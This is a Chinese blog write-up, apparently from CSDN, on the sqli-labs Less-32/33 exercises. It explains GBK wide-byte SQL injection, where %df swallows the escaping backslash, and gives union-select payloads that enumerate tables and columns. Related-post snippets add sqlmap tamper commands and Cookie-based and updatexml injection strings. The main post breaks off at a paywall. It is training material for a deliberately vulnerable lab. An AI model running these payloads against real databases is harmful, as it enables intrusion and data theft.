Sqli-labs Less32-Less33 宽字节注入

最新推荐文章于 2025-05-14 10:26:51 发布
最新推荐文章于 2025-05-14 10:26:51 发布
阅读量896 收藏 15
点赞数 32
CC 4.0 BY-SA版权
分类专栏: # Sqli-labs 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/140697615

文章目录

宽字节注入

什么是宽字节?

如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节

  • 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节
  • 英文默认占一个字节,中文占两个字节

宽字节注入原理

sql注入很关键的一步就是让引号闭合和跳出引号,如果无法跳出引号,那么你输入的内容就永远在引号里,你输出的内容就永远都是字符串

php里面有个转义符\对输入的敏感信息和特殊字符进行转义

就是的单引号' 被转义后变成了\'那么我们输入的内容被转义后就之被当作了一个字符串,无法实现包裹字符串的作用了,所以宽字节注入就是让转义失去转义的作用

\转义符通过编码为%5c,找到另一半让他们组成一个新的字符%df%5c就行了

%df与反斜杠的 URL 编码 %5C 闭合,从而构成 GBK 国标码中的汉字“連”,使得用于转义的反斜杠被我们“吃掉”了。

Less_32

sqli-labs - 随笔分类

image-20240719143802349

可以看到虽然输入?id=1'的时候页面没有报错,但是可以看到我们的单引号是被转义掉了的

在使用单引号的时候使用宽字节注入即可

?id=1%df' order by 4--+
?id=-1%df' union select 1,database(),3--+
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
注意此处数据库名要用十六进制 (HEX) 编码替代,避免单引号的使用。
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+
?id=-1%df' union select 1,group
最低0.47元/天 解锁文章

200万优质内容无限畅学
sql注入宽字节注入
m0_52484587的博客
07-11 1124
str:需要添加反斜线的字符串。
sqli-labs Less-3233、34、35、36、37(sqli-labs闯关指南 3233、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 2032
sqli-labs Less-3233、34、35、36、37(sqli-labs闯关指南 3233、34、35、36、37)—宽字节注入
sqli-labs/Less-32
m0_71299382的博客
11-20 369
sqli-labs第三十二关
sqlilabs-right-Less-32宽字节注入
最新发布
2301_80753596的博客
05-14 338
python sqlmap.py -u "http://127.0.0.1:808/sqlilabs-right/Less-32/?id=1" --dbs --batch --tamper unmagicquotes python sqlmap.py -u "http://127.0.0.1:808/sqlilabs-right/Less-32/?id=1" -tamper unmagicquotes -batch -D DVWA -tables python sqlmap.py -u "http://
sqli-labs:less-32宽字节注入
羽的博客
10-19 3237
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs————Less-32
Fly_鹏程万里
05-19 1164
Less-32查看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqli-labs less32
qq_45106794的博客
10-30 472
#sqli-labs less 32 这关主要是采用宽字节注入 Less-32,33,34,35,36,37 六关全部是针对’和\的过滤,所以我们放在一起来进行讨论。对宽字节注入的同学应该对这几关的 bypass 方式应该比较了解。我们在此介绍一下宽字节注入的原理和基本用法。原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii ...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 775
继续学习sqli-labs,本篇是less 32-37
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 820
一丢丢Sqli-labs小练习
sqli-labs less-19 less-20 less-22
weixin_74182283的博客
04-02 1212
由于上述所说的cookie原理,一开始是不会有cookie信息的,但登录后,就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。
sqli-labs————Less-33
Fly_鹏程万里
05-19 747
Less-33查看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqli-labs (less-32)
kukudeshuo的博客
03-13 2705
sqli-labs (less-32) 进入32关,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 424
2、 当数据库的编码为GBK时,可以使用宽字节注入宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
sql_lab之sqli中的宽字节注入less32
qq_59020256的博客
12-23 634
id=-1%df' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询。8.查username和password。爆出security里面的table表。4.用union联合查询判断回显点。出现 \’ 则证明是宽字节注入宽字节注入less-32)显示登录成功则构成闭环。
sqli-labs/Less-33
m0_71299382的博客
11-20 241
sqli-labs第三十三关
sqli-labs (less-33)
kukudeshuo的博客
03-13 816
sqli-labs (less-33) 进入33关,输入id=1 这里我们直接通过查看源代码查看这关是否也使用了GBK编码 可知确实使用了GBK编码,所以我们在单引号前面输入%df即可让单引号成功逃逸 http://127.0.0.1/sql1/Less-33/?id=1%df' 根据错误显示判断闭合方式为’–+,并且为字符型注入 查看回显位置 http://127.0.0.1/sql1/Less-33/?id=-1%df' union select 1,2,3--+ 接下来的步骤与less-3
宽字节注入& Sqli-labs Less 32
信安小菜鸡的博客
05-01 251
宽字节注入 宽字节注入值得是当设置GBK编码后,遇到两个连续字节都符合GBK取值范围时会自动解析为一个汉字,从而达到将原来得过滤字符去掉的效果 如图所示,id=1’单引号被自动过滤为\,导致参数始终被单引号包围无法逃逸。 此时若编码为GBK可以使用宽字节注入,通过先增加GBK编码使得反斜杠失效 如下图,反斜杠编码为%5c,GBK编码中%df%5c为某繁字体,此时单引号成功逃逸,从而能够进行后续注入Sqli-labs Less 32 测试发现单引号被转义为斜杠和单引号,因此只需要消除斜杠 同理加上%
sqli-labs-less-32~37
giun的博客
02-14 471
我们先介绍下宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ Less-32 http://127.0.0.1/sqli-labs-master/Less-32/?id=1' 会发现对\进行了过滤 http:/...
Sqli-labs less 32
weixin_34185560的博客
08-11 86
Less-32 利用上述的原理,我们可以进行尝试payload为: http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27union%20select%201,user(),3--+ 可以看到,我们绕过了对于 ' 的过滤。接下来从源代码进行考虑: 上述函数为过滤 ' \ 的函数,将 ' 转为 \' , 将 \ 转为 \\ ,将 " 转为 \"。因...
sqli-labs less20
02-22
### sqli-labs less20 实验教程 #### 了解目标环境 sqli-labs 是一个用于学习和实践 SQL 注入技术的平台。Less-20 关卡专注于通过 `Cookie` 进行 SQL 注入攻击[^3]。 #### 准备工作 确保已经安装并配置好 PHP 和 MySQL 环境,并且成功部署了 sqli-labs 平台。访问 Less-20 页面,观察其 URL 结构以及如何处理请求参数。 #### 测试注入点 尝试修改浏览器发送给服务器的 HTTP 请求头中的 `Cookie` 字段来测试是否存在漏洞。具体来说,在原始 `Cookie` 值后面附加恶意负载以探测数据库结构或提取敏感数据。 例如,可以通过篡改 `uname` 的值来进行联合查询(UNION SELECT),从而获取当前使用的数据库名称: ```http GET /sqli/Less-20/ HTTP/1.1 Host: localhost ... Cookie: uname=admin' UNION ALL SELECT NULL,database(),NULL-- ``` 上述 Payload 利用了闭合单引号 `'` 来结束预期输入,并紧接着执行新的 SQL 片段;两个连续破折线 `--` 表示注释掉后续部分以防报错中断整个语句。 #### 提升技巧:绕过简单防护措施 当面对某些基本防御机制时——比如自动转义特殊字符函数如 mysql_real_escape_string() ,可以考虑采用宽字节编码等方式构造有效载荷实现突破[^2]。 对于本关而言,则是利用 Base64 编码后的字符串作为用户名传递给应用程序,以此规避潜在过滤规则的影响。实际操作过程中需注意调整编码方式匹配后台解析逻辑。 #### 获取更多细节信息 一旦确认存在可被利用之处后,便能进一步挖掘其他有用情报,像枚举出 users 表内的字段名列表那样: ```sql Cookie: uname=<base64_encoded_payload> ``` 其中 `<base64_encoded_payload>` 应替换为经过适当转换得到的结果,形似如下所示: ```plaintext admin') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'# ``` 这会返回 user 表中所有的列名作为一个单一字符串输出到页面上供分析人员查看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值